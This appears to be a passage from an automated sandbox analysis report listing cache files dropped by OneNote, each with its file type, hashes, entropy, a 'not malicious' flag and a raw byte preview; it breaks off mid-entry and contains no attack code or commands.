Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.1......1..>..3...w.!A.1..>..3...w.!A.1..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............L..b3..5...^Q.O....N...^.................-fZ6C....\|...........f........................................I.qk..B.....LZ.............L..b3..5...^Q.O.........L..b3..5...^Q.O..........1......1......1..........................................1j.....1T.]...1......1..B...1H.....1..B...1..>.).1..J...................;........4...4...4.."...............1..1..1..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........1......1....#.1............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000055.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000056.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.329070915402667
Encrypted:	false
SSDEEP:	48:YuOs9weMu4eeUbtgHuSEuVLdQXY9mp7oxrdQqrzYxBX7xwyLuJPx/x7fqJ:YhsreUbKOSEuVRQXY9mp7wRQyol2Hq
MD5:	ED576D6EA639D4D246D58582301D15E2
SHA1:	D0C834C8DBC7B5C0D73B7351DBA725D8E2BB6758
SHA-256:	7AC0CC974DBC37DCDB33511287143563D2A54F471C2FB9C489458C1DA61CEFF0
SHA-512:	F2D5E2BFFCC8E6AB2D26494D5DD127C681A472FDA01D66552B97F255E1C8E0EA949FA74B3DA49247951D7533FEC447D6D35CCB021F0AC4E5EC54F26CB6A8FEFE
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.+&......+&.....0......t.+&.....0......t.+&..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............}?.....)m.n-......N...^...............>..4_.N....Z.6.........f........................................I.qk..B.....LZ.............}?.....)m.n-...........}?.....)m.n-............+&......+&......+&..........................................+&j.....+&T.]...+&......+&..B...+&H.....+&..B...+&..>.).+&..J...................;........4...4...4.."...............+&..+&..+&..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........+&......+&....#.+&............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000057.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.339477932528002
Encrypted:	false
SSDEEP:	96:YbBsg7Ewsa/rLmEr7vXA9ef8RQyr2jEwy0+ga:WBsg73saTvr7vXA9ef8RJra3y0+g
MD5:	78DB96337B919A24D33A84F2BBAB50F4
SHA1:	6E9BA344E61DD01A584AEC06962E362F67C1FBE7
SHA-256:	A36EEC7B334702AAA462F3C13053CFF003C469D8CFB931B5299FAF4BD23086EA
SHA-512:	B0C838ED07C4C4498D70136AF82FA241E076528B494548D6A6B2196DC2A3337C11100FE5EB40752083ECE283072B034A82478ADFFFD61063ABA6291E6804A496
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ'.;.....'.;!......(DG.e.'.;!......(DG.e.'.;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............9...e....b...S.....N...^.................A.$.pJ./..~}~.........f........................................I.qk..B.....LZ............9...e....b...S.........9...e....b...S..........'.;.....'.;.....'.;.........................................'.;j....'.;T.]..'.;.....'.;..B..'.;H....'.;..B..'.;..>.)'.;..J...................;........4...4...4.."..............'.;.'.;.'.;..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........'.;.....'.;....#'.;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000059.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345828344538076
Encrypted:	false
SSDEEP:	96:Y1WqsIOpmIdIsEPJXle9e8xKRQyFMIFMjlQ:KsI1IuPJXw9e8xKRJ2I2j
MD5:	30D0BAF75508C2FCF691BE5F2259AD5E
SHA1:	FC7A5801EB2A42FC88BF4301FE983F6E8B086791
SHA-256:	A759AA739A08E079494371D8EBFF8E12C0C38E90A81A24879B607D76C49C34A5
SHA-512:	944A2C75803F53D7CBDDBA4D39F44FDB108DBD2E9858234EC506C3FFDC38170B29A4C5D76E4F1353FAD729C35A9426581E189E7DEA57F5E726A59769DF7A59D9
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ...........N..v.,..Zu......N..v.,..Zu........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............;.K...H.&w.k.5.....N...^................+...M^K.k-.rw..........f........................................I.qk..B.....LZ............;.K...H.&w.k.5.........;.K...H.&w.k.5.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.309860154508284
Encrypted:	false
SSDEEP:	48:ssQSsGTItNEWE+YlLMXx29ugoVrdQqrzQ8SBXak9oG5:ss0oIzHEpl4Xx29ugURQyk8Sj
MD5:	7B4F12A349F6653AC03437272EBC19E7
SHA1:	3E367A6EC11E66C688E666DB38A775E8E3C382A5
SHA-256:	29891BB82498ECF41DEEEC134E73A16117ADDA09677D189A4207AA5E8B548267
SHA-512:	BD8D0E6E766583776975B46AF3AFA15F302F8068833F4050C437C8F6B6BD54B5E730D0ED9B9FE9654DA76B860946AA53ED56818E531FE83981500E59098C7C0F
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.X.......X........U.?.U.X........U.?.U.X...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................g.../...c..b....N...^................Q.K...G...s..8A........f........................................I.qk..B.....LZ...............g.../...c..b...........g.../...c..b..........X.......X.......X...........................................X.j.....X.T.]...X.......X...B...X.H.....X...B...X...>.).X...J...................;........4...4...4.."...............X...X...X...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........X.......X.....#.X.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.614579976967333
Encrypted:	false
SSDEEP:	48:NsQfl+GdN4t0Y9DE3/L60X4heN9CFoY4rdQqrLJwBXxbYAAaYe/AXR1R:NsL8N4KsE3/hX19CFv4RQyyq
MD5:	23AEFDE5AA9C0B0B229BE131AF483DC7
SHA1:	AAF4D13DE62E113E976B978811DD307E624DB0A2
SHA-256:	474968DD4DBD5D2A872B5EB9A1BCA0F9196E5D18AA4480B8D547C4A9CEEC19B5
SHA-512:	1A15C0F3A6DE1CDCCB3112F627AAF7F99A30426E91F4B03940EC77C8AD8657D6799B371472C2F44C59BC58C1E8E5B1385CF9CB329D8175CD8976E0D36356B3E9
Malicious:	false
Preview:	2...>...........v...~...................................................................................................................................2...>...f.......v................................I.......I.qk..B.....LZ@${.....@${ec....,a.b../@${ec....,a.b../@${..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................7.U..4.&..Z....N...^................o....rO.....!........f...................................:....I.qk..B.....LZ...............7.U..4.&..Z...........7.U..4.&.*.Z.........@${.....@${.....@${.........................................@${j....@${T.]..@${.....@${..B..@${H....@${..B..@${..>.)@${..J...................;........4...4...4.."..............@${.@${.@${..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........@${.....@${....#@${............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3300705431473006
Encrypted:	false
SSDEEP:	96:YdsN7jZMgGaEXMR7X89KYcRQywUuL6Puo47J:esNHZMz3XMR7X89KYcRJw
MD5:	1F30F4149397B56A9441A39EFB4962A6
SHA1:	FF3378480B31AE7EEC91000D0E1A7057257C2449
SHA-256:	CC70BD082A0CE494AF95FFC851D0F34E5557218CD266EEE5A26469370CBD0992
SHA-512:	7A8E361FB2637CF8788C31B4A7ED9C2B79757F52B1743AFE529682726D0448322E8E6AB7A5A9BF42FAA138EE87172D7051E4B425A7CCF1C8A9475A32D2AFFB31
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.z......z\|.......'Mi..z\|.......'Mi..z..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v3d.g@j.41....<.....N...^.................\..UUJ......P.........f........................................I.qk..B.....LZ............v3d.g@j.41....<.........v3d.g@j.41....<...........z......z......z..........................................zj.....zT.]...z......z..B...zH.....z..B...z..>.).z..J...................;........4...4...4.."...............z..z..z..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........z......z....#.z............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3146482526253624
Encrypted:	false
SSDEEP:	48:SsXU06BNaXpzV4t1lE5VLPBXgM9W5/oNrdQqrEwJyBXlma3JBNanH2/QQxboath3:Ssw6pzV41E5VtXgM9WNcRQyCP7l
MD5:	1DA9D86428D8F8BE8A14FB0FF672F931
SHA1:	83B5DA50D4D0993D1D11138CFF341BE3384340E9
SHA-256:	C5998CABE3D9907D516B8DA445C5FC25A3A3E17B7DD24AF36EB12F70891FD702
SHA-512:	6436F4963523AA881E1F6BD41B6690645019BD5B87A7607E989DFD50EE71BEA003356B1DB39A5214208786887C8B5B92A5435B0CA25F69AD4789314A02B96425
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..i.......i....1....]..i....1....]..i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............C..)Cg....0...H....N...^...............KY.l..WA.#.Es..x........f........................................I.qk..B.....LZ.............C..)Cg....0...H.........C..)Cg....0...H...........i.......i.......i...........................................ij......iT.]....i.......i..B....iH......i..B....i..>.)..i..J...................;........4...4...4.."................i...i...i..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........i.......i....#..i............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.312149666120548
Encrypted:	false
SSDEEP:	48:msvqSAjq4nA+tK1AyXEr0DgXnv9S8oVrdQqrDT9SBXqp3zBJwstB:msP4nB2XEugXv9S80RQyfkCwg
MD5:	BCB633D33CA674AA215B3ED3151A6AAC
SHA1:	EF8A64B3DCBBADBAD59A3F6D3D2615C3200BB83C
SHA-256:	1EDA5E6DC2FA4B2436B5B728B48D65979B8660C3CBA1008E234DD03682B293B9
SHA-512:	73ACEE52EC3CC0F831D5ECE52FFBBDC90F99296C3858E5F6A5581A222D665FD60C5E7D13CBF5876EC5C374E1B2576CF5E5EB1E763B9A1ACCC3F7121D1FCDAB78
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..T.......T!.(..,.....#$..T!.(..,.....#$..T..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............<Gh.@'..=.:,t.K(....N...^..................!...N...2. ..........f........................................I.qk..B.....LZ............<Gh.@'..=.:,t.K(........<Gh.@'..=.:,t.K(...........T.......T.......T...........................................Tj......TT.]....T.......T..B....TH......T..B....T..>.)..T..J...................;........4...4...4.."................T...T...T..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........T.......T....#..T............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.429612900760069
Encrypted:	false
SSDEEP:	96:os3lE4ieEkEwQXGB92SkRQyQGE42QeoT:os3lTieawQXGB92SkRJQGT2Qeo
MD5:	68F7A61C93954CCC369D8430C2149F7E
